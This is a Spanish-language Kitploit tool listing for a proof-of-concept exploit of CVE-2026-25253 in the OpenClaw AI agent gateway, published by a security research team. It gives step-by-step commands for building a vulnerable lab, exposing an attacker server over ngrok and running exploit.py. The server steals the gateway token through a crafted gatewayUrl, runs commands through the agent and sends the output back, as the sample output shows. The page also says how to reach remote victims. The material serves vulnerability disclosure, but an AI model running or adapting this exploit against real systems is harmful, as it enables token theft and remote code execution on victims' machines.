Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-25253 — Exfiltración de tokens de autenticación OpenClaw | Kitploit
Herramientas/GitHubGitHub/eqstlab/cve-2026-25253
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubeqstlab/cve-2026-25253

CVE-2026-25253

Exfiltración de tokens de autenticación OpenClaw

Ver Repositorio
26hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-25253 OpenClaw RCE en 1 clic

★ CVE-2026-25253 PoC de OpenClaw RCE en 1 clic ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

Descripción

CVE-2026-25253 : Vulnerabilidad de Exfiltración del Token de Autenticación de OpenClaw

descripción: OpenClaw (también conocido como clawdbot o Moltbot) anterior a v2026.1.29 permite a los atacantes exfiltrar un token de autenticación de gateway almacenado proporcionando un valor query-string gatewayUrl manipulado a la interfaz de Control, que establece automáticamente una conexión WebSocket sin validación ni confirmación del usuario. Esto puede llevar a acceso no autorizado al gateway y ejecución remota de código en 1 clic.

Requisitos

  • Docker (Docker Desktop en Windows)
  • Python 3.x (lado atacante)

Archivos

  • Dockerfile — construir el entorno vulnerable de OpenClaw
  • templates/ — páginas web maliciosas utilizadas por el exploit
  • config.txt — configuración de OpenClaw utilizada en el entorno víctima
  • exploit.py — servidor del exploit
Descargar herramienta
  • requirements.txt — dependencias del PoC
  • Configuración del Entorno

    1. Construir la imagen Docker
    root@kitploit:~
    docker build -t openclaw-vuln .
    
    1. Ejecutar entorno (Windows)
    root@kitploit:~
    docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
    
    1. Crear túnel SSH
    root@kitploit:~
    ssh-keygen -R [127.0.0.1]:2222
    ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
    
    • Password: openclawlab
    1. Acceder a la interfaz de Control de OpenClaw Abrir la siguiente URL en el navegador
    root@kitploit:~
    http://127.0.0.1:18789/
    
    1. Ingresar el token de gateway d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
    2. Hacer clic en Conectar
    3. Abrir la pestaña Config
    4. pegar el contenido de config.txt
    5. Reemplazar el campo de clave API con tu clave API de OpenAI
    6. Guardar la configuración
    7. Confirmar que el agente responde normalmente

    Prueba de Concepto (PoC)

    1. Instalar dependencias (lado atacante)
    root@kitploit:~
    pip3 install -r requirements.txt
    
    1. Exponer el servidor del exploit sobre HTTPS
    root@kitploit:~
    wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
    tar xzf ngrok-v3-stable-linux-amd64.tgz
    ./ngrok authtoken YOUR_TOKEN
    ./ngrok http 13337
    
    • Copiar el nombre de host de reenvío generado
    1. Ejecutar servidor del exploit
    root@kitploit:~
    python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"
    

    Ejemplo:

    root@kitploit:~
    python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
    
    1. Desencadenar el ataque
    1. Abrir la página maliciosa expuesta por el servidor del exploit
    2. Simular la interacción de la víctima con la página
    3. Desencadenar el flujo del exploit desde el navegador

    Flujo del Ataque

    1. Una URL maliciosa cambia el gatewayUrl de la interfaz de Control de la víctima
    2. El navegador se conecta automáticamente al punto final WebSocket controlado por el atacante
    3. El token de autenticación del gateway se filtra al atacante
    4. La página maliciosa utiliza el token robado para abrir una nueva conexión WebSocket al gateway local de OpenClaw de la víctima
    5. Se envía una solicitud de ejecución de comandos a través del agente
    6. El resultado de la ejecución se devuelve al servidor del atacante

    Resultado Esperado

    • El navegador de la víctima es redirigido al flujo WebSocket malicioso
    • El token de autenticación del gateway es capturado por el atacante
    • El atacante puede enviar una solicitud de ejecución de comandos a través de OpenClaw
    • La salida del comando se devuelve al servidor del atacante

    Ejemplo de Salida

    root@kitploit:~
    [*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
    [*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
    
    ==================================================
          [!] EXPLOIT RESULT CAPTURED [!]
    ==================================================
    HOSTNAME=openclaw-vuln
    PWD=/root
    HOME=/root
    ...
    ==================================================
    

    Notas

    • Este PoC está dirigido a OpenClaw 2026.1.24-1
    • La cadena del exploit depende del manejo vulnerable de gatewayUrl en la interfaz de Control
    • Para el acceso remoto de la víctima, la página maliciosa debe servirse sobre HTTPS
    • El gateway local de OpenClaw se alcanza a través del navegador de la víctima como puente

    EQST Insight

    Publicamos análisis de CVE y malware una vez al mes. Si estás interesado, sigue los enlaces a continuación para revisar nuestras publicaciones.

    • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
    • EN : https://www.skshieldus.com/en/report?tab=eqst